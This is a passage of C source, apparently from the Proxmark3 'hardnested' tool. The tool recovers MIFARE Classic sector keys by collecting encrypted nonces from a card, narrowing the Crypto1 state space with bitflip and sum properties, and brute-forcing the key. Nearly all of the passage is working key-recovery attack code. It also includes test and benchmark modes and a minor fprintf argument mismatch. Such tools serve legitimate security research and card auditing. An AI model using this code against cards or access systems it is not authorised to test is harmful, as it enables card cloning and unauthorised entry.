uint32_t mask = masks[odd_even][num_common];
bool found_match = false;
for (uint8_t remaining_bits = 0; remaining_bits <= (~mask & 0xff); remaining_bits++) {
if (remaining_bits_match(num_common, bytes_diff, state, (state & mask) | remaining_bits, odd_even)) {
#ifdef DEBUG_KEY_ELIMINATION
if (bitflips_match(byte2, (state & mask) | remaining_bits, odd_even, true)) {
#else
if (bitflips_match(byte2, (state & mask) | remaining_bits, odd_even)) {
#endif
found_match = true;
break;
}
}
}
if (!found_match) {
#ifdef DEBUG_KEY_ELIMINATION
if (known_target_key != -1 && state == test_state[odd_even]) {
printf("all_bitflips_match() 1st Byte: %s test state (0x%06x): Eliminated. Bytes = %02x, %02x, Common Bits = %d\n",
odd_even==ODD_STATE?"odd":"even",
test_state[odd_even],
byte, byte2, num_common);
if (failstr[0] == '\0') {
sprintf(failstr, "Other 1st Byte %s, all_bitflips_match(), no match", odd_even?"odd":"even");
}
}
#endif
return false;
}
}
return true;
}
static void bitarray_to_list(uint8_t byte, uint32_t *bitarray, uint32_t *state_list, uint32_t *len, odd_even_t odd_even)
{
uint32_t *p = state_list;
for (uint32_t state = next_state(bitarray, -1L); state < (1<<24); state = next_state(bitarray, state)) {
if (all_bitflips_match(byte, state, odd_even)) {
*p++ = state;
}
}
// add End Of List marker
*p = 0xffffffff;
*len = p - state_list;
}
static void add_cached_states(statelist_t *candidates, uint16_t part_sum_a0, uint16_t part_sum_a8, odd_even_t odd_even)
{
candidates->states[odd_even] = sl_cache[part_sum_a0/2][part_sum_a8/2][odd_even].sl;
candidates->len[odd_even] = sl_cache[part_sum_a0/2][part_sum_a8/2][odd_even].len;
return;
}
static void add_matching_states(statelist_t *candidates, uint8_t part_sum_a0, uint8_t part_sum_a8, odd_even_t odd_even)
{
uint32_t worstcase_size = 1<<20;
candidates->states[odd_even] = (uint32_t *)malloc(sizeof(uint32_t) * worstcase_size);
if (candidates->states[odd_even] == NULL) {
PrintAndLog("Out of memory error in add_matching_states() - statelist.\n");
exit(4);
}
uint32_t *candidates_bitarray = (uint32_t *)malloc_bitarray(sizeof(uint32_t) * (1<<19));
if (candidates_bitarray == NULL) {
PrintAndLog("Out of memory error in add_matching_states() - bitarray.\n");
free(candidates->states[odd_even]);
exit(4);
}
uint32_t *bitarray_a0 = part_sum_a0_bitarrays[odd_even][part_sum_a0/2];
uint32_t *bitarray_a8 = part_sum_a8_bitarrays[odd_even][part_sum_a8/2];
uint32_t *bitarray_bitflips = nonces[best_first_bytes[0]].states_bitarray[odd_even];
// for (uint32_t i = 0; i < (1<<19); i++) {
// candidates_bitarray[i] = bitarray_a0[i] & bitarray_a8[i] & bitarray_bitflips[i];
// }
bitarray_AND4(candidates_bitarray, bitarray_a0, bitarray_a8, bitarray_bitflips);
bitarray_to_list(best_first_bytes[0], candidates_bitarray, candidates->states[odd_even], &(candidates->len[odd_even]), odd_even);
if (candidates->len[odd_even] == 0) {
free(candidates->states[odd_even]);
candidates->states[odd_even] = NULL;
} else if (candidates->len[odd_even] + 1 < worstcase_size) {
candidates->states[odd_even] = realloc(candidates->states[odd_even], sizeof(uint32_t) * (candidates->len[odd_even] + 1));
}
free_bitarray(candidates_bitarray);
pthread_mutex_lock(&statelist_cache_mutex);
sl_cache[part_sum_a0/2][part_sum_a8/2][odd_even].sl = candidates->states[odd_even];
sl_cache[part_sum_a0/2][part_sum_a8/2][odd_even].len = candidates->len[odd_even];
sl_cache[part_sum_a0/2][part_sum_a8/2][odd_even].cache_status = COMPLETED;
pthread_mutex_unlock(&statelist_cache_mutex);
return;
}
static statelist_t *add_more_candidates(void)
{
statelist_t *new_candidates = candidates;
if (candidates == NULL) {
candidates = (statelist_t *)malloc(sizeof(statelist_t));
new_candidates = candidates;
} else {
new_candidates = candidates;
while (new_candidates->next != NULL) {
new_candidates = new_candidates->next;
}
new_candidates = new_candidates->next = (statelist_t *)malloc(sizeof(statelist_t));
}
new_candidates->next = NULL;
new_candidates->len[ODD_STATE] = 0;
new_candidates->len[EVEN_STATE] = 0;
new_candidates->states[ODD_STATE] = NULL;
new_candidates->states[EVEN_STATE] = NULL;
return new_candidates;
}
static void add_bitflip_candidates(uint8_t byte)
{
statelist_t *candidates = add_more_candidates();
for (odd_even_t odd_even = EVEN_STATE; odd_even <= ODD_STATE; odd_even++) {
uint32_t worstcase_size = nonces[byte].num_states_bitarray[odd_even] + 1;
candidates->states[odd_even] = (uint32_t *)malloc(sizeof(uint32_t) * worstcase_size);
if (candidates->states[odd_even] == NULL) {
PrintAndLog("Out of memory error in add_bitflip_candidates().\n");
exit(4);
}
bitarray_to_list(byte, nonces[byte].states_bitarray[odd_even], candidates->states[odd_even], &(candidates->len[odd_even]), odd_even);
if (candidates->len[odd_even] + 1 < worstcase_size) {
candidates->states[odd_even] = realloc(candidates->states[odd_even], sizeof(uint32_t) * (candidates->len[odd_even] + 1));
}
}
return;
}
static bool TestIfKeyExists(uint64_t key)
{
struct Crypto1State *pcs;
pcs = crypto1_create(key);
crypto1_byte(pcs, (cuid >> 24) ^ best_first_bytes[0], true);
uint32_t state_odd = pcs->odd & 0x00ffffff;
uint32_t state_even = pcs->even & 0x00ffffff;
uint64_t count = 0;
for (statelist_t *p = candidates; p != NULL; p = p->next) {
bool found_odd = false;
bool found_even = false;
uint32_t *p_odd = p->states[ODD_STATE];
uint32_t *p_even = p->states[EVEN_STATE];
if (p_odd != NULL && p_even != NULL) {
while (*p_odd != 0xffffffff) {
if ((*p_odd & 0x00ffffff) == state_odd) {
found_odd = true;
break;
}
p_odd++;
}
while (*p_even != 0xffffffff) {
if ((*p_even & 0x00ffffff) == state_even) {
found_even = true;
}
p_even++;
}
count += (uint64_t)(p_odd - p->states[ODD_STATE]) * (uint64_t)(p_even - p->states[EVEN_STATE]);
}
if (found_odd && found_even) {
num_keys_tested += count;
hardnested_print_progress(num_acquired_nonces, "(Test: Key found)", 0.0, 0);
crypto1_destroy(pcs);
return true;
}
}
num_keys_tested += count;
hardnested_print_progress(num_acquired_nonces, "(Test: Key NOT found)", 0.0, 0);
crypto1_destroy(pcs);
return false;
}
static work_status_t book_of_work[NUM_PART_SUMS][NUM_PART_SUMS][NUM_PART_SUMS][NUM_PART_SUMS];
static void init_book_of_work(void)
{
for (uint8_t p = 0; p < NUM_PART_SUMS; p++) {
for (uint8_t q = 0; q < NUM_PART_SUMS; q++) {
for (uint8_t r = 0; r < NUM_PART_SUMS; r++) {
for (uint8_t s = 0; s < NUM_PART_SUMS; s++) {
book_of_work[p][q][r][s] = TO_BE_DONE;
}
}
}
}
}
static void *generate_candidates_worker_thread(void *args)
{
uint16_t *sum_args = (uint16_t *)args;
uint16_t sum_a0 = sums[sum_args[0]];
uint16_t sum_a8 = sums[sum_args[1]];
// uint16_t my_thread_number = sums[2];
bool there_might_be_more_work = true;
do {
there_might_be_more_work = false;
for (uint8_t p = 0; p < NUM_PART_SUMS; p++) {
for (uint8_t q = 0; q < NUM_PART_SUMS; q++) {
if (2*p*(16-2*q) + (16-2*p)*2*q == sum_a0) {
// printf("Reducing Partial Statelists (p,q) = (%d,%d) with lengths %d, %d\n",
// p, q, partial_statelist[p].len[ODD_STATE], partial_statelist[q].len[EVEN_STATE]);
for (uint8_t r = 0; r < NUM_PART_SUMS; r++) {
for (uint8_t s = 0; s < NUM_PART_SUMS; s++) {
if (2*r*(16-2*s) + (16-2*r)*2*s == sum_a8) {
pthread_mutex_lock(&book_of_work_mutex);
if (book_of_work[p][q][r][s] != TO_BE_DONE) { // this has been done or is currently been done by another thread. Look for some other work.
pthread_mutex_unlock(&book_of_work_mutex);
continue;
}
pthread_mutex_lock(&statelist_cache_mutex);
if (sl_cache[p][r][ODD_STATE].cache_status == WORK_IN_PROGRESS
|| sl_cache[q][s][EVEN_STATE].cache_status == WORK_IN_PROGRESS) { // defer until not blocked by another thread.
pthread_mutex_unlock(&statelist_cache_mutex);
pthread_mutex_unlock(&book_of_work_mutex);
there_might_be_more_work = true;
continue;
}
// we finally can do some work.
book_of_work[p][q][r][s] = WORK_IN_PROGRESS;
statelist_t *current_candidates = add_more_candidates();
// Check for cached results and add them first
bool odd_completed = false;
if (sl_cache[p][r][ODD_STATE].cache_status == COMPLETED) {
add_cached_states(current_candidates, 2*p, 2*r, ODD_STATE);
odd_completed = true;
}
bool even_completed = false;
if (sl_cache[q][s][EVEN_STATE].cache_status == COMPLETED) {
add_cached_states(current_candidates, 2*q, 2*s, EVEN_STATE);
even_completed = true;
}
bool work_required = true;
// if there had been two cached results, there is no more work to do
if (even_completed && odd_completed) {
work_required = false;
}
// if there had been one cached empty result, there is no need to calculate the other part:
if (work_required) {
if (even_completed && !current_candidates->len[EVEN_STATE]) {
current_candidates->len[ODD_STATE] = 0;
current_candidates->states[ODD_STATE] = NULL;
work_required = false;
}
if (odd_completed && !current_candidates->len[ODD_STATE]) {
current_candidates->len[EVEN_STATE] = 0;
current_candidates->states[EVEN_STATE] = NULL;
work_required = false;
}
}
if (!work_required) {
pthread_mutex_unlock(&statelist_cache_mutex);
pthread_mutex_unlock(&book_of_work_mutex);
} else {
// we really need to calculate something
if (even_completed) { // we had one cache hit with non-zero even states
// printf("Thread #%u: start working on odd states p=%2d, r=%2d...\n", my_thread_number, p, r);
sl_cache[p][r][ODD_STATE].cache_status = WORK_IN_PROGRESS;
pthread_mutex_unlock(&statelist_cache_mutex);
pthread_mutex_unlock(&book_of_work_mutex);
add_matching_states(current_candidates, 2*p, 2*r, ODD_STATE);
work_required = false;
} else if (odd_completed) { // we had one cache hit with non-zero odd_states
// printf("Thread #%u: start working on even states q=%2d, s=%2d...\n", my_thread_number, q, s);
sl_cache[q][s][EVEN_STATE].cache_status = WORK_IN_PROGRESS;
pthread_mutex_unlock(&statelist_cache_mutex);
pthread_mutex_unlock(&book_of_work_mutex);
add_matching_states(current_candidates, 2*q, 2*s, EVEN_STATE);
work_required = false;
}
}
if (work_required) { // we had no cached result. Need to calculate both odd and even
sl_cache[p][r][ODD_STATE].cache_status = WORK_IN_PROGRESS;
sl_cache[q][s][EVEN_STATE].cache_status = WORK_IN_PROGRESS;
pthread_mutex_unlock(&statelist_cache_mutex);
pthread_mutex_unlock(&book_of_work_mutex);
add_matching_states(current_candidates, 2*p, 2*r, ODD_STATE);
if(current_candidates->len[ODD_STATE]) {
// printf("Thread #%u: start working on even states q=%2d, s=%2d...\n", my_thread_number, q, s);
add_matching_states(current_candidates, 2*q, 2*s, EVEN_STATE);
} else { // no need to calculate even states yet
pthread_mutex_lock(&statelist_cache_mutex);
sl_cache[q][s][EVEN_STATE].cache_status = TO_BE_DONE;
pthread_mutex_unlock(&statelist_cache_mutex);
current_candidates->len[EVEN_STATE] = 0;
current_candidates->states[EVEN_STATE] = NULL;
}
}
// update book of work
pthread_mutex_lock(&book_of_work_mutex);
book_of_work[p][q][r][s] = COMPLETED;
pthread_mutex_unlock(&book_of_work_mutex);
// if ((uint64_t)current_candidates->len[ODD_STATE] * current_candidates->len[EVEN_STATE]) {
// printf("Candidates for p=%2u, q=%2u, r=%2u, s=%2u: %" PRIu32 " * %" PRIu32 " = %" PRIu64 " (2^%0.1f)\n",
// 2*p, 2*q, 2*r, 2*s, current_candidates->len[ODD_STATE], current_candidates->len[EVEN_STATE],
// (uint64_t)current_candidates->len[ODD_STATE] * current_candidates->len[EVEN_STATE],
// log((uint64_t)current_candidates->len[ODD_STATE] * current_candidates->len[EVEN_STATE])/log(2));
// uint32_t estimated_odd = estimated_num_states_part_sum(best_first_bytes[0], p, r, ODD_STATE);
// uint32_t estimated_even= estimated_num_states_part_sum(best_first_bytes[0], q, s, EVEN_STATE);
// uint64_t estimated_total = (uint64_t)estimated_odd * estimated_even;
// printf("Estimated: %" PRIu32 " * %" PRIu32 " = %" PRIu64 " (2^%0.1f)\n", estimated_odd, estimated_even, estimated_total, log(estimated_total) / log(2));
// if (estimated_odd < current_candidates->len[ODD_STATE] || estimated_even < current_candidates->len[EVEN_STATE]) {
// printf("############################################################################ERROR! ESTIMATED < REAL !!!\n");
// //exit(2);
// }
// }
}
}
}
}
}
}
} while (there_might_be_more_work);
return NULL;
}
static void generate_candidates(uint8_t sum_a0_idx, uint8_t sum_a8_idx)
{
// printf("Generating crypto1 state candidates... \n");
// estimate maximum candidate states
// maximum_states = 0;
// for (uint16_t sum_odd = 0; sum_odd <= 16; sum_odd += 2) {
// for (uint16_t sum_even = 0; sum_even <= 16; sum_even += 2) {
// if (sum_odd*(16-sum_even) + (16-sum_odd)*sum_even == sum_a0) {
// maximum_states += (uint64_t)count_states(part_sum_a0_bitarrays[EVEN_STATE][sum_even/2])
// * count_states(part_sum_a0_bitarrays[ODD_STATE][sum_odd/2]);
// }
// }
// }
// printf("Number of possible keys with Sum(a0) = %d: %" PRIu64 " (2^%1.1f)\n", sum_a0, maximum_states, log(maximum_states)/log(2.0));
init_statelist_cache();
init_book_of_work();
// create mutexes for accessing the statelist cache and our "book of work"
pthread_mutex_init(&statelist_cache_mutex, NULL);
pthread_mutex_init(&book_of_work_mutex, NULL);
// create and run worker threads
pthread_t thread_id[NUM_REDUCTION_WORKING_THREADS];
uint16_t sums[NUM_REDUCTION_WORKING_THREADS][3];
for (uint16_t i = 0; i < NUM_REDUCTION_WORKING_THREADS; i++) {
sums[i][0] = sum_a0_idx;
sums[i][1] = sum_a8_idx;
sums[i][2] = i+1;
pthread_create(thread_id + i, NULL, generate_candidates_worker_thread, sums[i]);
}
// wait for threads to terminate:
for (uint16_t i = 0; i < NUM_REDUCTION_WORKING_THREADS; i++) {
pthread_join(thread_id[i], NULL);
}
// clean up mutex
pthread_mutex_destroy(&statelist_cache_mutex);
maximum_states = 0;
for (statelist_t *sl = candidates; sl != NULL; sl = sl->next) {
maximum_states += (uint64_t)sl->len[ODD_STATE] * sl->len[EVEN_STATE];
}
for (uint8_t i = 0; i < NUM_SUMS; i++) {
if (nonces[best_first_bytes[0]].sum_a8_guess[i].sum_a8_idx == sum_a8_idx) {
nonces[best_first_bytes[0]].sum_a8_guess[i].num_states = maximum_states;
break;
}
}
update_expected_brute_force(best_first_bytes[0]);
hardnested_print_progress(num_acquired_nonces, "Apply Sum(a8) and all bytes bitflip properties", nonces[best_first_bytes[0]].expected_num_brute_force, 0);
}
static void free_candidates_memory(statelist_t *sl)
{
if (sl == NULL) {
return;
} else {
free_candidates_memory(sl->next);
free(sl);
}
}
static void pre_XOR_nonces(void)
{
// prepare acquired nonces for faster brute forcing.
// XOR the cryptoUID and its parity
for (uint16_t i = 0; i < 256; i++) {
noncelistentry_t *test_nonce = nonces[i].first;
while (test_nonce != NULL) {
test_nonce->nonce_enc ^= cuid;
test_nonce->par_enc ^= oddparity8(cuid >> 0 & 0xff) << 0;
test_nonce->par_enc ^= oddparity8(cuid >> 8 & 0xff) << 1;
test_nonce->par_enc ^= oddparity8(cuid >> 16 & 0xff) << 2;
test_nonce->par_enc ^= oddparity8(cuid >> 24 & 0xff) << 3;
test_nonce = test_nonce->next;
}
}
}
static bool brute_force(uint64_t *found_key)
{
if (known_target_key != -1) {
TestIfKeyExists(known_target_key);
}
return brute_force_bs(NULL, candidates, cuid, num_acquired_nonces, maximum_states, nonces, best_first_bytes, found_key);
}
static uint16_t SumProperty(struct Crypto1State *s)
{
uint16_t sum_odd = PartialSumProperty(s->odd, ODD_STATE);
uint16_t sum_even = PartialSumProperty(s->even, EVEN_STATE);
return (sum_odd*(16-sum_even) + (16-sum_odd)*sum_even);
}
static void Tests()
{
if (known_target_key != -1) {
for (odd_even_t odd_even = EVEN_STATE; odd_even <= ODD_STATE; odd_even++) {
uint32_t *bitset = nonces[best_first_bytes[0]].states_bitarray[odd_even];
if (!test_bit24(bitset, test_state[odd_even])) {
printf("\nBUG: known target key's %s state is not member of first nonce byte's (0x%02x) states_bitarray!\n",
odd_even==EVEN_STATE?"even":"odd ",
best_first_bytes[0]);
}
}
}
if (known_target_key != -1) {
for (odd_even_t odd_even = EVEN_STATE; odd_even <= ODD_STATE; odd_even++) {
uint32_t *bitset = all_bitflips_bitarray[odd_even];
if (!test_bit24(bitset, test_state[odd_even])) {
printf("\nBUG: known target key's %s state is not member of all_bitflips_bitarray!\n",
odd_even==EVEN_STATE?"even":"odd ");
}
}
}
}
static void Tests2(void)
{
if (known_target_key != -1) {
for (odd_even_t odd_even = EVEN_STATE; odd_even <= ODD_STATE; odd_even++) {
uint32_t *bitset = nonces[best_first_byte_smallest_bitarray].states_bitarray[odd_even];
if (!test_bit24(bitset, test_state[odd_even])) {
printf("\nBUG: known target key's %s state is not member of first nonce byte's (0x%02x) states_bitarray!\n",
odd_even==EVEN_STATE?"even":"odd ",
best_first_byte_smallest_bitarray);
}
}
}
if (known_target_key != -1) {
for (odd_even_t odd_even = EVEN_STATE; odd_even <= ODD_STATE; odd_even++) {
uint32_t *bitset = all_bitflips_bitarray[odd_even];
if (!test_bit24(bitset, test_state[odd_even])) {
printf("\nBUG: known target key's %s state is not member of all_bitflips_bitarray!\n",
odd_even==EVEN_STATE?"even":"odd ");
}
}
}
}
static uint16_t real_sum_a8 = 0;
static void set_test_state(uint8_t byte)
{
struct Crypto1State *pcs;
pcs = crypto1_create(known_target_key);
crypto1_byte(pcs, (cuid >> 24) ^ byte, true);
test_state[ODD_STATE] = pcs->odd & 0x00ffffff;
test_state[EVEN_STATE] = pcs->even & 0x00ffffff;
real_sum_a8 = SumProperty(pcs);
crypto1_destroy(pcs);
}
int mfnestedhard(uint8_t blockNo, uint8_t keyType, uint8_t *key, uint8_t trgBlockNo, uint8_t trgKeyType, uint8_t *trgkey, bool nonce_file_read, bool nonce_file_write, bool slow, int tests, uint64_t *foundkey)
{
char progress_text[80];
srand((unsigned) time(NULL));
brute_force_per_second = brute_force_benchmark();
write_stats = false;
if (tests) {
// set the correct locale for the stats printing
write_stats = true;
setlocale(LC_NUMERIC, "");
if ((fstats = fopen("hardnested_stats.txt","a")) == NULL) {
PrintAndLog("Could not create/open file hardnested_stats.txt");
return 3;
}
for (uint32_t i = 0; i < tests; i++) {
start_time = msclock();
print_progress_header();
sprintf(progress_text, "Brute force benchmark: %1.0f million (2^%1.1f) keys/s", brute_force_per_second/1000000, log(brute_force_per_second)/log(2.0));
hardnested_print_progress(0, progress_text, (float)(1LL<<47), 0);
sprintf(progress_text, "Starting Test #%" PRIu32 " ...", i+1);
hardnested_print_progress(0, progress_text, (float)(1LL<<47), 0);
if (trgkey != NULL) {
known_target_key = bytes_to_num(trgkey, 6);
} else {
known_target_key = -1;
}
init_bitflip_bitarrays();
init_part_sum_bitarrays();
init_sum_bitarrays();
init_allbitflips_array();
init_nonce_memory();
update_reduction_rate(0.0, true);
simulate_acquire_nonces();
set_test_state(best_first_bytes[0]);
Tests();
free_bitflip_bitarrays();
fprintf(fstats, "%" PRIu16 ";%1.1f;", sums[first_byte_Sum], log(p_K0[first_byte_Sum])/log(2.0));
fprintf(fstats, "%" PRIu16 ";%1.1f;", sums[nonces[best_first_bytes[0]].sum_a8_guess[0].sum_a8_idx], log(p_K[nonces[best_first_bytes[0]].sum_a8_guess[0].sum_a8_idx])/log(2.0));
fprintf(fstats, "%" PRIu16 ";", real_sum_a8);
#ifdef DEBUG_KEY_ELIMINATION
failstr[0] = '\0';
#endif
bool key_found = false;
num_keys_tested = 0;
uint32_t num_odd = nonces[best_first_byte_smallest_bitarray].num_states_bitarray[ODD_STATE];
uint32_t num_even = nonces[best_first_byte_smallest_bitarray].num_states_bitarray[EVEN_STATE];
float expected_brute_force1 = (float)num_odd * num_even / 2.0;
float expected_brute_force2 = nonces[best_first_bytes[0]].expected_num_brute_force;
fprintf(fstats, "%1.1f;%1.1f;", log(expected_brute_force1)/log(2.0), log(expected_brute_force2)/log(2.0));
if (expected_brute_force1 < expected_brute_force2) {
hardnested_print_progress(num_acquired_nonces, "(Ignoring Sum(a8) properties)", expected_brute_force1, 0);
set_test_state(best_first_byte_smallest_bitarray);
add_bitflip_candidates(best_first_byte_smallest_bitarray);
Tests2();
maximum_states = 0;
for (statelist_t *sl = candidates; sl != NULL; sl = sl->next) {
maximum_states += (uint64_t)sl->len[ODD_STATE] * sl->len[EVEN_STATE];
}
//printf("Number of remaining possible keys: %" PRIu64 " (2^%1.1f)\n", maximum_states, log(maximum_states)/log(2.0));
// fprintf("fstats, "%" PRIu64 ";", maximum_states);
best_first_bytes[0] = best_first_byte_smallest_bitarray;
pre_XOR_nonces();
prepare_bf_test_nonces(nonces, best_first_bytes[0]);
//hardnested_print_progress(num_acquired_nonces, "Starting brute force...", expected_brute_force1, 0);
key_found = brute_force(foundkey);
free(candidates->states[ODD_STATE]);
free(candidates->states[EVEN_STATE]);
free_candidates_memory(candidates);
candidates = NULL;
} else {
pre_XOR_nonces();
prepare_bf_test_nonces(nonces, best_first_bytes[0]);
for (uint8_t j = 0; j < NUM_SUMS && !key_found; j++) {
float expected_brute_force = nonces[best_first_bytes[0]].expected_num_brute_force;
sprintf(progress_text, "(%d. guess: Sum(a8) = %" PRIu16 ")", j+1, sums[nonces[best_first_bytes[0]].sum_a8_guess[j].sum_a8_idx]);
hardnested_print_progress(num_acquired_nonces, progress_text, expected_brute_force, 0);
if (sums[nonces[best_first_bytes[0]].sum_a8_guess[j].sum_a8_idx] != real_sum_a8) {
sprintf(progress_text, "(Estimated Sum(a8) is WRONG! Correct Sum(a8) = %" PRIu16 ")", real_sum_a8);
hardnested_print_progress(num_acquired_nonces, progress_text, expected_brute_force, 0);
}
// printf("Estimated remaining states: %" PRIu64 " (2^%1.1f)\n", nonces[best_first_bytes[0]].sum_a8_guess[j].num_states, log(nonces[best_first_bytes[0]].sum_a8_guess[j].num_states)/log(2.0));
generate_candidates(first_byte_Sum, nonces[best_first_bytes[0]].sum_a8_guess[j].sum_a8_idx);
// printf("Time for generating key candidates list: %1.0f sec (%1.1f sec CPU)\n", difftime(time(NULL), start_time), (float)(msclock() - start_clock)/1000.0);
//hardnested_print_progress(num_acquired_nonces, "Starting brute force...", expected_brute_force, 0);
key_found = brute_force(foundkey);
free_statelist_cache();
free_candidates_memory(candidates);
candidates = NULL;
if (!key_found) {
// update the statistics
nonces[best_first_bytes[0]].sum_a8_guess[j].prob = 0;
nonces[best_first_bytes[0]].sum_a8_guess[j].num_states = 0;
// and calculate new expected number of brute forces
update_expected_brute_force(best_first_bytes[0]);
}
}
}
#ifdef DEBUG_KEY_ELIMINATION
fprintf(fstats, "%1.1f;%1.0f;%d;%s\n", log(num_keys_tested)/log(2.0), (float)num_keys_tested/brute_force_per_second, key_found, failstr);
#else
fprintf(fstats, "%1.0f;%d\n", log(num_keys_tested)/log(2.0), (float)num_keys_tested/brute_force_per_second, key_found);
#endif
free_nonces_memory();
free_bitarray(all_bitflips_bitarray[ODD_STATE]);
free_bitarray(all_bitflips_bitarray[EVEN_STATE]);
free_sum_bitarrays();
free_part_sum_bitarrays();
}
fclose(fstats);
} else {
start_time = msclock();
print_progress_header();
sprintf(progress_text, "Brute force benchmark: %1.0f million (2^%1.1f) keys/s", brute_force_per_second/1000000, log(brute_force_per_second)/log(2.0));
hardnested_print_progress(0, progress_text, (float)(1LL<<47), 0);
init_bitflip_bitarrays();
init_part_sum_bitarrays();
init_sum_bitarrays();
init_allbitflips_array();
init_nonce_memory();
update_reduction_rate(0.0, true);
if (nonce_file_read) { // use pre-acquired data from file nonces.bin
if (read_nonce_file() != 0) {
free_bitflip_bitarrays();
free_nonces_memory();
free_bitarray(all_bitflips_bitarray[ODD_STATE]);
free_bitarray(all_bitflips_bitarray[EVEN_STATE]);
free_sum_bitarrays();
free_part_sum_bitarrays();
return 3;
}
hardnested_stage = CHECK_1ST_BYTES | CHECK_2ND_BYTES;
update_nonce_data(false);
float brute_force;
shrink_key_space(&brute_force);
} else { // acquire nonces.
uint16_t is_OK = acquire_nonces(blockNo, keyType, key, trgBlockNo, trgKeyType, nonce_file_write, slow);
if (is_OK != 0) {
free_bitflip_bitarrays();
free_nonces_memory();
free_bitarray(all_bitflips_bitarray[ODD_STATE]);
free_bitarray(all_bitflips_bitarray[EVEN_STATE]);
free_sum_bitarrays();
free_part_sum_bitarrays();
return is_OK;
}
}
if (trgkey != NULL) {
known_target_key = bytes_to_num(trgkey, 6);
set_test_state(best_first_bytes[0]);
} else {
known_target_key = -1;
}
Tests();
free_bitflip_bitarrays();
bool key_found = false;
num_keys_tested = 0;
uint32_t num_odd = nonces[best_first_byte_smallest_bitarray].num_states_bitarray[ODD_STATE];
uint32_t num_even = nonces[best_first_byte_smallest_bitarray].num_states_bitarray[EVEN_STATE];
float expected_brute_force1 = (float)num_odd * num_even / 2.0;
float expected_brute_force2 = nonces[best_first_bytes[0]].expected_num_brute_force;
if (expected_brute_force1 < expected_brute_force2) {
hardnested_print_progress(num_acquired_nonces, "(Ignoring Sum(a8) properties)", expected_brute_force1, 0);
set_test_state(best_first_byte_smallest_bitarray);
add_bitflip_candidates(best_first_byte_smallest_bitarray);
Tests2();
maximum_states = 0;
for (statelist_t *sl = candidates; sl != NULL; sl = sl->next) {
maximum_states += (uint64_t)sl->len[ODD_STATE] * sl->len[EVEN_STATE];
}
// printf("Number of remaining possible keys: %" PRIu64 " (2^%1.1f)\n", maximum_states, log(maximum_states)/log(2.0));
best_first_bytes[0] = best_first_byte_smallest_bitarray;
pre_XOR_nonces();
prepare_bf_test_nonces(nonces, best_first_bytes[0]);
//hardnested_print_progress(num_acquired_nonces, "Starting brute force...", expected_brute_force1, 0);
key_found = brute_force(foundkey);
free(candidates->states[ODD_STATE]);
free(candidates->states[EVEN_STATE]);
free_candidates_memory(candidates);
candidates = NULL;
} else {
pre_XOR_nonces();
prepare_bf_test_nonces(nonces, best_first_bytes[0]);
for (uint8_t j = 0; j < NUM_SUMS && !key_found; j++) {
float expected_brute_force = nonces[best_first_bytes[0]].expected_num_brute_force;
sprintf(progress_text, "(%d. guess: Sum(a8) = %" PRIu16 ")", j+1, sums[nonces[best_first_bytes[0]].sum_a8_guess[j].sum_a8_idx]);
hardnested_print_progress(num_acquired_nonces, progress_text, expected_brute_force, 0);
if (trgkey != NULL && sums[nonces[best_first_bytes[0]].sum_a8_guess[j].sum_a8_idx] != real_sum_a8) {
sprintf(progress_text, "(Estimated Sum(a8) is WRONG! Correct Sum(a8) = %" PRIu16 ")", real_sum_a8);
hardnested_print_progress(num_acquired_nonces, progress_text, expected_brute_force, 0);
}
// printf("Estimated remaining states: %" PRIu64 " (2^%1.1f)\n", nonces[best_first_bytes[0]].sum_a8_guess[j].num_states, log(nonces[best_first_bytes[0]].sum_a8_guess[j].num_states)/log(2.0));
generate_candidates(first_byte_Sum, nonces[best_first_bytes[0]].sum_a8_guess[j].sum_a8_idx);
// printf("Time for generating key candidates list: %1.0f sec (%1.1f sec CPU)\n", difftime(time(NULL), start_time), (float)(msclock() - start_clock)/1000.0);
//hardnested_print_progress(num_acquired_nonces, "Starting brute force...", expected_brute_force, 0);
key_found = brute_force(foundkey);
free_statelist_cache();
free_candidates_memory(candidates);
candidates = NULL;
if (!key_found) {
// update the statistics
nonces[best_first_bytes[0]].sum_a8_guess[j].prob = 0;
nonces[best_first_bytes[0]].sum_a8_guess[j].num_states = 0;
// and calculate new expected number of brute forces
update_expected_brute_force(best_first_bytes[0]);
}
}
}
free_nonces_memory();
free_bitarray(all_bitflips_bitarray[ODD_STATE]);
free_bitarray(all_bitflips_bitarray[EVEN_STATE]);
free_sum_bitarrays();
free_part_sum_bitarrays();
}
return 0;
}